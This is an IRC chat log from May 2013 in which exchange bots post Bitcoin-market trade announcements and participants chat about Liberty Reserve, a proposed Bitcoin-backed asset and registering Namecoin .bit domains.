BTC [-] May 28 16:42:02 [HAVELOCK] [ASICM] 8 @ 0.02468 = 0.1974 BTC [+] May 28 16:42:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.024511 = 0.0735 BTC [-] May 28 16:43:02 [HAVELOCK] [ASICM] 3 @ 0.02468 = 0.074 BTC [+] May 28 16:48:33 [BTCTC] [CRYPTO-TRADE] 25 @ 0.2 = 5 BTC [+] May 28 16:50:20 [BTCTC] [S.MPOE-PT] 50 @ 0.00067 = 0.0335 BTC [+] May 28 16:50:56 [MPEX] [S.MPOE] 16093 @ 0.00067571 = 10.8742 BTC [-] May 28 16:50:58 [MPEX] [S.MPOE] 10100 @ 0.00067551 = 6.8227 BTC [-] May 28 16:51:04 [MPEX] [S.MPOE] 2241 @ 0.00067352 = 1.5094 BTC [-] May 28 16:52:23 [MPEX] [S.MPOE] 2850 @ 0.00068093 = 1.9407 BTC [+] May 28 16:52:27 [MPEX] [S.MPOE] 4321 @ 0.00068412 = 2.9561 BTC [+] May 28 16:52:29 [MPEX] [S.MPOE] 10000 @ 0.00068426 = 6.8426 BTC [+] May 28 16:52:44 [MPEX] [S.MPOE] 4629 @ 0.00068478 = 3.1698 BTC [+] May 28 16:52:46 [MPEX] [S.MPOE] 6900 @ 0.00068478 = 4.725 BTC [+] May 28 16:52:48 [MPEX] [S.MPOE] 2366 @ 0.00068536 = 1.6216 BTC [+] May 28 16:53:01 [MPEX] [S.MPOE] 18850 @ 0.00068593 = 12.9298 BTC [+] May 28 16:53:03 [MPEX] [S.MPOE] 7750 @ 0.00068607 = 5.317 BTC [+] May 28 16:53:04 [MPEX] [S.MPOE] 22652 @ 0.00068634 = 15.547 BTC [+] May 28 16:53:06 [MPEX] [S.MPOE] 9500 @ 0.00068663 = 6.523 BTC [+] May 28 16:53:07 [MPEX] [S.MPOE] 4000 @ 0.00068702 = 2.7481 BTC [+] May 28 16:53:09 [MPEX] [S.MPOE] 8100 @ 0.00068799 = 5.5727 BTC [+] May 28 16:53:17 [MPEX] [S.MPOE] 38082 @ 0.00068896 = 26.237 BTC [+] May 28 16:53:18 [MPEX] [S.MPOE] 5418 @ 0.00068896 = 3.7328 BTC [+] May 28 16:53:19 [MPEX] [S.MPOE] 8850 @ 0.00068924 = 6.0998 BTC [+] May 28 16:53:27 [MPEX] [S.MPOE] 4321 @ 0.000695 = 3.0031 BTC [+] May 28 16:54:30 [BTCTC] [S.MPOE-PT] 17 @ 0.000668 = 0.0114 BTC [-] May 28 16:54:32 [BTCTC] [S.MPOE-PT] 300 @ 0.000667 = 0.2001 BTC [-] May 28 16:55:02 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 28 16:55:04 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [-] May 28 16:55:36 [BTCTC] [S.MPOE-PT] 20 @ 0.000666 = 0.0133 BTC [-] May 28 16:55:51 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [-] May 28 16:56:09 [BTCTC] [ASICMINER-PT] 8 @ 2.465 = 19.72 BTC [-] May 28 16:56:18 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] May 28 16:56:21 [BTCTC] [ASICMINER-PT] 1 @ 2.485 BTC [+] May 28 16:56:25 [BTCTC] [ASICMINER-PT] 2 @ 2.485 = 4.97 BTC [+] May 28 16:56:27 [BTCTC] [ASICMINER-PT] 20 @ 2.4875 = 49.75 BTC [+] May 28 16:56:32 [BTCTC] [ASICMINER-PT] 28 @ 2.49 = 69.72 BTC [+] May 28 16:56:34 [BTCTC] [ASICMINER-PT] 10 @ 2.49 = 24.9 BTC [+] May 28 16:56:35 [BTCTC] [ASICMINER-PT] 5 @ 2.499999 = 12.5 BTC [+] May 28 16:57:54 ;;bc,stats May 28 16:57:56 Current Blocks: 238359 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 1544 blocks | Next Difficulty In About: 1 week, 2 days, 20 hours, 1 minute, and 31 seconds | Next Difficulty Estimate: 13790573.5822 | Estimated Percent Change: 13.4708 May 28 16:59:46 ;;ticker May 28 16:59:46 BTCUSD ticker | Best bid: 127.20001, Best ask: 127.59000, Bid-ask spread: 0.38999, Last trade: 127.80000, 24 hour volume: 51221.49073322, 24 hour low: 124.00000, 24 hour high: 135.00000, 24 hour vwap: 128.34709 May 28 17:01:50 [BTCTC] [ASICMINER-PT] 10 @ 2.4999 = 24.999 BTC [-] May 28 17:03:57 [BTCTC] [TAT.ASICMINER] 24 @ 0.02475 = 0.594 BTC [+] May 28 17:06:51 [MPEX] [S.MPOE] 4000 @ 0.00070646 = 2.8258 BTC [+] May 28 17:11:21 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 28 17:15:02 [HAVELOCK] [ASICM] 16 @ 0.024679 = 0.3949 BTC [-] May 28 17:18:03 [HAVELOCK] [ASICM] 52 @ 0.02468 = 1.2834 BTC [+] May 28 17:19:02 [BTCTC] [BITVPS] 10 @ 0.000629 = 0.0063 BTC [-] May 28 17:19:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.024798 BTC [+] May 28 17:24:34 [MPEX] [S.MPOE] 4321 @ 0.0007088 = 3.0627 BTC [+] May 28 17:24:36 [MPEX] [S.MPOE] 16021 @ 0.00070888 = 11.357 BTC [+] May 28 17:24:46 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [+] May 28 17:33:09 [BTCTC] [ASICMINER-PT] 3 @ 2.495 = 7.485 BTC [-] May 28 17:33:10 [BTCTC] [ASICMINER-PT] 5 @ 2.499 = 12.495 BTC [+] May 28 17:34:16 [BTCTC] [ASICMINER-PT] 5 @ 2.4999 = 12.4995 BTC [+] May 28 17:34:23 [HAVELOCK] [HIM] 1 @ 2.6201 BTC [-] May 28 17:34:50 [BTCTC] [ASICMINER-PT] 13 @ 2.499999 = 32.5 BTC [+] May 28 17:35:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.024798 BTC [+] May 28 17:35:41 [BTCTC] [TAT.ASICMINER] 33 @ 0.024799 = 0.8184 BTC [+] May 28 17:35:59 [BTCTC] [TAT.ASICMINER] 40 @ 0.0249 = 0.996 BTC [+] May 28 17:36:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.0249 = 0.0996 BTC [+] May 28 17:36:43 [BTCTC] [ASICMINER-PT] 1 @ 2.499999 BTC [+] May 28 17:39:04 [HAVELOCK] [HIM] 1 @ 2.62 BTC [-] May 28 17:39:06 [BTCTC] [TAT.ASICMINER] 16 @ 0.02489 = 0.3982 BTC [-] May 28 17:39:12 [BTCTC] [BASIC-MINING] 2 @ 0.598 = 1.196 BTC [-] May 28 17:39:16 [BTCTC] [BASIC-MINING] 4 @ 0.6 = 2.4 BTC [+] May 28 17:39:18 [BTCTC] [BASIC-MINING] 2 @ 0.6 = 1.2 BTC [+] May 28 17:39:19 [BTCTC] [BASIC-MINING] 2 @ 0.61 = 1.22 BTC [+] May 28 17:40:17 [BTCTC] [S.DICE-PT] 5 @ 0.0031 = 0.0155 BTC [+] May 28 17:40:48 [MPEX] [S.MPOE] 5728 @ 0.00071395 = 4.0895 BTC [+] May 28 17:42:27 [MPEX] [S.MPOE] 4000 @ 0.00070647 = 2.8259 BTC [-] May 28 17:43:35 [BTCTC] [ASICMINER-PT] 6 @ 2.499999 = 15 BTC [+] May 28 17:44:16 [BTCTC] [RSM] 1 @ 0.0086 BTC [-] May 28 17:44:18 [BTCTC] [RSM] 174 @ 0.008591 = 1.4948 BTC [-] May 28 17:46:01 [HAVELOCK] [ASICM] 3 @ 0.02468 = 0.074 BTC [+] May 28 17:46:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.02455 = 0.221 BTC [-] May 28 17:48:00 [BTCTC] [TAT.ASICMINER] 51 @ 0.02489 = 1.2694 BTC [+] May 28 17:49:57 [BTCTC] [TAT.ASICMINER] 11 @ 0.02489 = 0.2738 BTC [+] May 28 17:56:26 [BTCTC] [COGNITIVE] 1 @ 0.289999 BTC [-] May 28 17:56:27 [BTCTC] [COGNITIVE] 1 @ 0.297 BTC [+] May 28 17:56:29 [BTCTC] [COGNITIVE] 2 @ 0.297995 = 0.596 BTC [+] May 28 17:58:28 [BTCTC] [ASICMINER-PT] 1 @ 2.5174 BTC [+] May 28 17:59:36 [BTCTC] [ASICMINER-PT] 1 @ 2.5175 BTC [+] May 28 18:00:13 [BTCTC] [ASICMINER-PT] 1 @ 2.5175 BTC [+] May 28 18:10:25 [BTCTC] [TAT.ASICMINER] 16 @ 0.02489 = 0.3982 BTC [+] May 28 18:10:36 [BTCTC] [COGNITIVE] 1 @ 0.299999 BTC [+] May 28 18:12:32 [BTCTC] [TAT.ASICMINER] 40 @ 0.02489 = 0.9956 BTC [+] May 28 18:13:19 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 28 18:13:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4812 BTC [-] May 28 18:13:23 [BTCTC] [ASICMINER-PT] 3 @ 2.481 = 7.443 BTC [-] May 28 18:14:47 [HAVELOCK] [HIM] 1 @ 2.61 BTC [-] May 28 18:15:20 [HAVELOCK] [HIM] 1 @ 2.6007 BTC [-] May 28 18:15:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [+] May 28 18:15:52 [HAVELOCK] [HIM] 1 @ 2.7702 BTC [+] May 28 18:16:08 [HAVELOCK] [HIM] 1 @ 2.7702 BTC [+] May 28 18:21:34 [HAVELOCK] [ASICM] 10 @ 0.02461 = 0.2461 BTC [-] May 28 18:27:13 [BTCTC] [COGNITIVE] 10 @ 0.3 = 3 BTC [+] May 28 18:27:17 [BTCTC] [COGNITIVE] 5 @ 0.309 = 1.545 BTC [+] May 28 18:29:22 [BTCTC] [TAT.ASICMINER] 365 @ 0.02489 = 9.0849 BTC [+] May 28 18:29:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.02489 = 0.3734 BTC [+] May 28 18:29:26 [BTCTC] [TAT.ASICMINER] 15 @ 0.024997 = 0.375 BTC [+] May 28 18:34:56 NYT is on it now. http://www.nytimes.com/2013/05/29/nyregion/liberty-reserve-operators-accused-of-money-laundering.html?hp May 28 18:41:38 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 28 18:41:59 this is kinda old neh ? May 28 18:46:19 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [+] May 28 18:46:21 [BTCTC] [ASICMINER-PT] 1 @ 2.515 BTC [+] May 28 18:46:26 [BTCTC] [ASICMINER-PT] 1 @ 2.51745 BTC [+] May 28 18:47:31 or is it unrelated with liberty dollar thing ? May 28 18:48:07 [BTCTC] [ASICMINER-PT] 1 @ 2.5174 BTC [-] May 28 18:48:29 [BTCTC] [ASICMINER-PT] 1 @ 2.51749 BTC [+] May 28 18:48:31 [BTCTC] [ASICMINER-PT] 4 @ 2.5175 = 10.07 BTC [+] May 28 18:48:33 its not the liberty dollar May 28 18:48:41 but this isnt new either, happened a few days ago May 28 18:49:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5174 BTC [-] May 28 18:50:02 [HAVELOCK] [ASICM] 121 @ 0.02468 = 2.9863 BTC [+] May 28 18:50:33 a, this is the budovski thing May 28 18:50:39 jesus so many liberty* stuff May 28 18:50:43 almost like coin* by now May 28 18:51:02 [HAVELOCK] [ASICM] 9 @ 0.02465 = 0.2219 BTC [-] May 28 18:52:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.02495 = 1.2475 BTC [-] May 28 18:54:07 [HAVELOCK] [ASICM] 20 @ 0.024689 = 0.4938 BTC [+] May 28 18:54:08 [HAVELOCK] [ASICM] 75 @ 0.02469 = 1.8518 BTC [+] May 28 18:54:09 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:11 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:12 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:13 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:14 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:15 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:16 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:17 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:17 [HAVELOCK] [ASICM] 100 @ 0.024795 = 2.4795 BTC [+] May 28 18:54:18 [HAVELOCK] [ASICM] 99 @ 0.024795 = 2.4547 BTC [+] May 28 18:54:20 nice May 28 18:54:54 thats not real May 28 18:55:01 surely not May 28 19:00:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.0249 = 1.245 BTC [-] May 28 19:05:01 [HAVELOCK] [ASICM] 46 @ 0.02468 = 1.1353 BTC [-] May 28 19:06:01 [HAVELOCK] [ASICM] 83 @ 0.02468 = 2.0484 BTC [-] May 28 19:08:16 [BTCTC] [ASICMINER-PT] 1 @ 2.5174 BTC [-] May 28 19:08:18 [BTCTC] [ASICMINER-PT] 4 @ 2.5175 = 10.07 BTC [+] May 28 19:10:38 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [+] May 28 19:10:39 [MPEX] [S.MPOE] 5769 @ 0.00071108 = 4.1022 BTC [+] May 28 19:10:42 [MPEX] [S.MPOE] 7531 @ 0.00071253 = 5.3661 BTC [+] May 28 19:16:01 [HAVELOCK] [ASICM] 40 @ 0.02468 = 0.9872 BTC [-] May 28 19:16:08 [BTCTC] [TAT.ASICMINER] 85 @ 0.0249 = 2.1165 BTC [-] May 28 19:18:01 [HAVELOCK] [ASICM] 1 @ 0.02468 BTC [-] May 28 19:18:09 mircea_popescu: you still around? May 28 19:18:28 ya. May 28 19:19:28 have you heard from smickles recently since you emailed him a month back or so? May 28 19:20:23 nope. May 28 19:21:46 is he a runner? May 28 19:24:01 [HAVELOCK] [ASICM] 8 @ 0.02468 = 0.1974 BTC [-] May 28 19:27:49 [BTCTC] [TAT.ASICMINER] 160 @ 0.0249 = 3.984 BTC [-] May 28 19:31:02 [HAVELOCK] [ASICM] 40 @ 0.02468 = 0.9872 BTC [-] May 28 19:33:27 thestringpuller he owe you btcs ? May 28 19:34:33 pfft May 28 19:34:40 he's got my bitnet shares May 28 19:34:53 bitbet* May 28 19:36:26 ThickAsThieves: those were erroneous trades announced. it came from our dev site from the new tradign engine testing we're doing May 28 19:36:36 trade announcing has now been disabled, sorry forgot about that :p May 28 19:37:01 [HAVELOCK] [ASICM] 20 @ 0.02468 = 0.4936 BTC [-] May 28 19:41:22 mircea_popescu: yea not many but a few May 28 19:41:32 at least 4 May 28 19:42:11 i c May 28 19:42:55 I know he's probably had that baby but it's crunching me a bit, wanted to be able to leverage a few things with those. May 28 19:43:13 [MPEX] [S.MPOE] 4256 @ 0.0007119 = 3.0298 BTC [-] May 28 19:44:12 ;/ May 28 19:44:47 yea, I guess it happens May 28 19:46:39 [BTCTC] [BASIC-MINING] 10 @ 0.61 = 6.1 BTC [+] May 28 19:47:46 [BTCTC] [TAT.ASICMINER] 113 @ 0.0249 = 2.8137 BTC [-] May 28 20:11:05 [BTCTC] [RSM] 1 @ 0.00877 BTC [+] May 28 20:12:09 [BTCTC] [RSM] 1 @ 0.008761 BTC [-] May 28 20:13:01 Chinese hackers just get their paws on everything these days May 28 20:13:12 http://www.abc.net.au/news/2013-05-27/asio-blueprints-stolen-in-major-hacking-operation/4715960 May 28 20:13:27 http://www.washingtonpost.com/world/national-security/confidential-report-lists-us-weapons-system-designs-compromised-by-chinese-cyberspies/2013/05/27/a42c3e1c-c2dd-11e2-8c3b-0b5e9247e8ca_story.html May 28 20:13:40 time for a new cold war? May 28 20:14:02 it's funny how excited the us peeps were over stuxnet May 28 20:14:14 but the fact is us intel was never worth a shit. May 28 20:15:20 [BTCTC] [RSM] 2 @ 0.008512 = 0.017 BTC [-] May 28 20:18:18 [BTCTC] [RSM] 1 @ 0.00852 BTC [+] May 28 20:18:22 [BTCTC] [RSM] 1 @ 0.008511 BTC [-] May 28 20:19:11 [BTCTC] [RSM] 1 @ 0.008511 BTC [-] May 28 20:20:00 [BTCTC] [RSM] 8 @ 0.0083 = 0.0664 BTC [-] May 28 20:21:07 [BTCTC] [RSM] 1 @ 0.011798 BTC [+] May 28 20:22:11 [BTCTC] [TAT.ASICMINER] 92 @ 0.0249 = 2.2908 BTC [-] May 28 20:22:51 [BTCTC] [RSM] 22 @ 0.011797 = 0.2595 BTC [-] May 28 20:22:56 https://bitcointalk.org/index.php?topic=218483.msg1521109 May 28 20:24:45 [BTCTC] [RSM] 4 @ 0.008033 = 0.0321 BTC [-] May 28 20:24:49 [BTCTC] [RSM] 6 @ 0.008032 = 0.0482 BTC [-] May 28 20:27:02 [HAVELOCK] [VTX] 2 @ 0.4251 = 0.8502 BTC [-] May 28 20:28:49 ThickAsThieves: that's pretty intriguing May 28 20:29:00 i wonder what MPOE-PR would have to say May 28 20:29:57 thats exactly why i posted it May 28 20:29:58 :) May 28 20:30:17 i was like, wtf? May 28 20:30:45 i dun think she has much to say to what ifs. May 28 20:33:10 but, what if May 28 20:33:44 what if we had a hyper space travel? May 28 20:33:57 [BTCTC] [BASIC-MINING] 6 @ 0.62 = 3.72 BTC [+] May 28 20:34:07 what if MP had his own forum account May 28 20:34:07 if that asset will be convertible to bitcoins, it will end up like gold May 28 20:34:37 jurov: ? May 28 20:34:55 ie people will exchange the shares into real bitcoins May 28 20:35:31 ah May 28 20:35:46 i dont think thats the point of it May 28 20:35:53 it would not be convertible May 28 20:35:56 *redeemable is a better word May 28 20:36:20 that would just make them bitcoins May 28 20:36:38 and redundant May 28 20:36:53 then what is the point? create a new kind of fiat, but backed by bitcoins? May 28 20:37:11 to create an asset May 28 20:37:16 that holds 1% of all coins May 28 20:37:34 which will never be sold as coins May 28 20:37:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.02461 = 0.0492 BTC [-] May 28 20:38:34 then there can be potentially a big spread between it and, say, mtgox May 28 20:38:40 it'd be worth 2 Winkelvii May 28 20:38:42 without means to arb it May 28 20:38:56 you would arb it via fiat May 28 20:39:26 the poster also sees at as something that would help set spot price May 28 20:39:49 honestly, there's never going to be an end of clueless people coming up with \what they think are bright ideas. May 28 20:39:50 how can you arb something that isn't convertible in both directions? May 28 20:39:54 ;;goxlag May 28 20:39:55 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). May 28 20:40:02 the reason is that being clueless, you lack the mechanisms that allow you to distinguish bad ideas May 28 20:40:07 and so everything seems great. May 28 20:40:07 by holding a position in both places May 28 20:40:40 [BTCTC] [TAT.ASICMINER] 51 @ 0.02461 = 1.2551 BTC [-] May 28 20:40:49 okay, so market goes in ine direction for a long time, and you and up by bitcoin position depleted May 28 20:41:19 you want bitcoins now, but you can't 1:1 exchange them May 28 20:41:23 the point isnt to arb it anyway May 28 20:41:31 nor to have bitcoins to spend May 28 20:41:37 you have to buy back at mkt price, rendering whiole arb pointless May 28 20:41:51 youre the one that made arba requirement May 28 20:42:13 if it can;'t be arbed, then it is *useless* as any spot price indicator. May 28 20:42:14 i think the poster is just selling his own bitcoin position as shares May 28 20:42:28 ThickAsThieves his own putative position. May 28 20:42:56 indeed May 28 20:42:57 basically, all the scammers in the world are trying to use bitcoin these days. it's like holy water. May 28 20:43:26 ThickAsThieves: i am selling my 100btc perpetual position, but you cannot exchange it to real bitcoins May 28 20:43:32 somehow the idea that their skills + a little work + a little honesty would actually yield something worthwhile playing honestly is beyond their grasp. May 28 20:43:36 send me 100btc and i'll sned you nice certificate May 28 20:43:39 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 28 20:43:51 jurov i do think thats the idea May 28 20:44:03 so, are you buying? May 28 20:44:03 and i do think if it were listed on wall st people would buy it May 28 20:44:07 me? no May 28 20:44:13 i can buy the real thing May 28 20:44:41 but i can see how some wouldnt want to be bothered May 28 20:44:58 isnt someone already doing this anyway? May 28 20:44:59 "i want to own some bitcoins but i don't want to be bothered" May 28 20:45:00 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [-] May 28 20:45:02 like Exante or someone May 28 20:45:31 its like people buying PT shares of AM sorta May 28 20:45:34 they dont need to May 28 20:45:37 but they do May 28 20:45:39 i suspect it's some paper gold scammer that wants to extend his operations May 28 20:46:03 maybe this wall st asset proves quite liquid May 28 20:46:07 and thats why May 28 20:46:10 i dunno May 28 20:46:26 [BTCTC] [ESECURITYSABTC] 3 @ 0.31 = 0.93 BTC [-] May 28 20:46:28 just figured it was somehting to poke you guys with May 28 20:47:45 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] May 28 20:47:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.024899 BTC [+] May 28 20:48:27 [BTCTC] [PAJKA.BOND] 1 @ 0.10901 BTC [-] May 28 20:51:24 consider yourself successful, i commented there May 28 20:51:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [-] May 28 20:54:52 [MPEX] [S.MPOE] 20394 @ 0.0007119 = 14.5185 BTC [-] May 28 20:58:01 [HAVELOCK] [ASICM] 20 @ 0.024402 = 0.488 BTC [-] May 28 21:00:01 [HAVELOCK] [ASICM] 16 @ 0.024402 = 0.3904 BTC [-] May 28 21:00:28 [BTCTC] [B.YABMC] 5 @ 0.017758 = 0.0888 BTC [-] May 28 21:03:41 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] May 28 21:05:01 [HAVELOCK] [ASICM] 15 @ 0.0244 = 0.366 BTC [-] May 28 21:07:01 [HAVELOCK] [ASICM] 60 @ 0.0244 = 1.464 BTC [-] May 28 21:09:02 [HAVELOCK] [ASICM] 26 @ 0.0243 = 0.6318 BTC [-] May 28 21:09:04 [HAVELOCK] [ASICM] 100 @ 0.0243 = 2.43 BTC [-] May 28 21:10:02 [HAVELOCK] [ASICM] 10 @ 0.0243 = 0.243 BTC [-] May 28 21:10:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.0248 = 0.1736 BTC [-] May 28 21:10:12 [BTCTC] [TAT.ASICMINER] 14 @ 0.024609 = 0.3445 BTC [-] May 28 21:11:02 [HAVELOCK] [SDICE] 2 @ 0.2226 = 0.4452 BTC [-] May 28 21:11:03 [HAVELOCK] [SDICE] 2 @ 0.2225 = 0.445 BTC [-] May 28 21:11:13 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] May 28 21:12:54 [MPEX] [S.MPOE] 7334 @ 0.00071071 = 5.2123 BTC [-] May 28 21:13:29 [BTCTC] [TAT.ASICMINER] 45 @ 0.024889 = 1.12 BTC [+] May 28 21:14:01 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] May 28 21:14:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.024888 BTC [-] May 28 21:15:56 [BTCTC] [B.YABMC] 1 @ 0.01476 BTC [-] May 28 21:15:59 [BTCTC] [B.YABMC] 58 @ 0.014213 = 0.8244 BTC [-] May 28 21:16:02 [BTCTC] [B.YABMC] 2 @ 0.014212 = 0.0284 BTC [-] May 28 21:16:04 [BTCTC] [B.YABMC] 1 @ 0.01421 BTC [-] May 28 21:19:33 ;;ticker May 28 21:19:34 BTCUSD ticker | Best bid: 128.32110, Best ask: 128.39900, Bid-ask spread: 0.07790, Last trade: 128.39900, 24 hour volume: 52513.02056830, 24 hour low: 124.00000, 24 hour high: 132.49500, 24 hour vwap: 127.73099 May 28 21:20:50 [BTCTC] [ASICMINER-PT] 6 @ 2.515 = 15.09 BTC [+] May 28 21:23:01 [HAVELOCK] [ASICM] 3 @ 0.0243 = 0.0729 BTC [-] May 28 21:23:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02461 BTC [-] May 28 21:26:01 [HAVELOCK] [ASICM] 192 @ 0.02445 = 4.6944 BTC [+] May 28 21:26:03 [HAVELOCK] [ASICM] 16 @ 0.02467979 = 0.3949 BTC [+] May 28 21:26:04 [HAVELOCK] [ASICM] 20 @ 0.0246798 = 0.4936 BTC [+] May 28 21:26:04 [HAVELOCK] [ASICM] 4 @ 0.0246799 = 0.0987 BTC [+] May 28 21:26:05 [HAVELOCK] [ASICM] 75 @ 0.02468 = 1.851 BTC [+] May 28 21:26:06 [HAVELOCK] [ASICM] 90 @ 0.024685 = 2.2217 BTC [+] May 28 21:27:07 [BTCTC] [ASICMINER-PT] 3 @ 2.51 = 7.53 BTC [-] May 28 21:27:38 [MPEX] [S.MPOE] 4119 @ 0.00071253 = 2.9349 BTC [+] May 28 21:29:14 [BTCTC] [BITVPS] 30 @ 0.000629 = 0.0189 BTC [-] May 28 21:34:02 [HAVELOCK] [ASICM] 1 @ 0.024685 BTC [+] May 28 21:38:15 lol "butbutbut i don't want to know if it's feasible. i want to know if it will be good or bad for bitcoin economy" May 28 21:39:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.024888 BTC [+] May 28 21:40:53 [BTCTC] [BASIC-MINING] 1 @ 0.580001 BTC [-] May 28 21:41:45 [MPEX] [S.MPOE] 5000 @ 0.00072642 = 3.6321 BTC [+] May 28 21:47:08 [BTCTC] [BITVPS] 50 @ 0.000629 = 0.0315 BTC [-] May 28 21:47:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.024888 BTC [+] May 28 21:48:46 [BTCTC] [ASICMINER-PT] 5 @ 2.510001 = 12.55 BTC [+] May 28 21:48:58 [BTCTC] [TAT.ASICMINER] 499 @ 0.024888 = 12.4191 BTC [+] May 28 21:49:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.024889 = 0.0747 BTC [+] May 28 21:57:04 Yesss. May 28 21:57:11 Got a .bit domain May 28 21:59:15 [BTCTC] [ASICMINER-PT] 2 @ 2.52699 = 5.054 BTC [+] May 28 21:59:53 heh May 28 21:59:58 didn teven know they existed May 28 21:59:59 [BTCTC] [ASICMINER-PT] 2 @ 2.527 = 5.054 BTC [+] May 28 22:00:04 it's really a namecoin thing? May 28 22:00:14 yep May 28 22:00:22 I got satoshinakamoto.bit May 28 22:00:26 suck it May 28 22:00:27 lol May 28 22:00:39 Bugpowder: how much nmc does it cost to reg 1 domain May 28 22:00:54 15 May 28 22:01:07 how much is 15 nmc in btc May 28 22:01:13 about .1 May 28 22:01:23 my buddy foglight is very bullish on namecoins May 28 22:01:37 lot of development has taken place recently May 28 22:01:43 I might buy a few k May 28 22:02:01 [HAVELOCK] [VTX] 3 @ 0.4388 = 1.3164 BTC [+] May 28 22:08:17 ;;bids 0 May 28 22:08:19 Bugpowder you should stock up on sexcoins May 28 22:08:31 There are currently 13413142 bitcoins demanded at or over 0.0 USD, worth 17546169.3309 USD in total. | Data vintage: 0.0929 seconds May 28 22:08:41 https://bitcointalk.org/index.php?topic=218158.0 May 28 22:08:43 can't go wrong May 28 22:08:44 ;;asks 111111111111111111111111 May 28 22:08:44 There are currently 103545.01 bitcoins offered at or under 1.11111111111e+23 USD, worth 6.99157153779e+13 USD in total. | Data vintage: 12.9314 seconds May 28 22:09:01 [HAVELOCK] [VTX] 1 @ 0.4389 BTC [+] May 28 22:09:03 [HAVELOCK] [VTX] 1 @ 0.4389 BTC [+] May 28 22:09:04 [HAVELOCK] [VTX] 1 @ 0.4389 BTC [+] May 28 22:09:40 i want sexcoins May 28 22:09:58 ill give u 5 May 28 22:10:29 oh shit May 28 22:10:31 is it good sexcoins May 28 22:10:34 all night May 28 22:10:34 need to start mining that now May 28 22:10:44 and dump on BTC-e in a week May 28 22:10:48 lol May 28 22:11:08 Well, dumping on someone might get you paid more May 28 22:11:20 some people are into wierd shit like that May 28 22:12:21 sexcoins will get you laid more May 28 22:13:01 [HAVELOCK] [ASICM] 9 @ 0.024685 = 0.2222 BTC [+] May 28 22:13:03 [HAVELOCK] [ASICM] 6 @ 0.024685 = 0.1481 BTC [+] May 28 22:13:08 Bugpowder: these guys will do it for 1LTC http://dotbit.me/ May 28 22:13:14 surprisingly May 28 22:13:34 [BTCTC] [S.DICE-PT] 2 @ 0.00314 = 0.0063 BTC [+] May 28 22:14:33 fiat500: yes that is where I registered May 28 22:14:52 1LTC is not quite 0.1btc lol May 28 22:14:55 oops May 28 22:15:02 but they do take 0.1btc May 28 22:15:05 which doesnt make sense May 28 22:15:12 http://blog.silktide.com/2013/01/the-stupid-cookie-law-is-dead-at-last/ May 28 22:26:23 i think i had a .bit domain 2 years ago May 28 22:28:13 [BTCTC] [TAT.ASICMINER] 200 @ 0.02475 = 4.95 BTC [-] May 28 22:31:01 [HAVELOCK] [ASICM] 185 @ 0.02469 = 4.5677 BTC [+] May 28 22:33:51 mpex.bit is taken May 28 22:33:55 sdice.bit is avail May 28 22:34:37 where are you lookin it up May 28 22:35:58 dotme.bit May 28 22:36:29 fucking ripoff dotme May 28 22:36:38 dotbit.me i mean May 28 22:36:44 sorry May 28 22:37:03 http://ltc.block-explorer.com/tx/aa94147205a6b741ddaeeb0880b1ee1b37e7bc3a3488736d6ebeb08b25d628db May 28 22:37:17 15 confirmations, and the site refuses to acknowledge the deposit May 28 22:37:54 weird. took me 2 confirms with .1 btc. May 28 22:37:57 but that was dumb May 28 22:38:25 Sorry, BIT.BIT is taken May 28 22:38:26 aww May 28 22:38:34 all the 3 letter ones are gone May 28 22:38:55 aww May 28 22:39:02 i want rib.bit May 28 22:39:42 therea re 76k .bit domains registered apparently May 28 22:47:51 [BTCTC] [BASIC-MINING] 1 @ 0.615399 BTC [+] May 28 22:48:49 [BTCTC] [BASIC-MINING] 3 @ 0.62 = 1.86 BTC [+] May 28 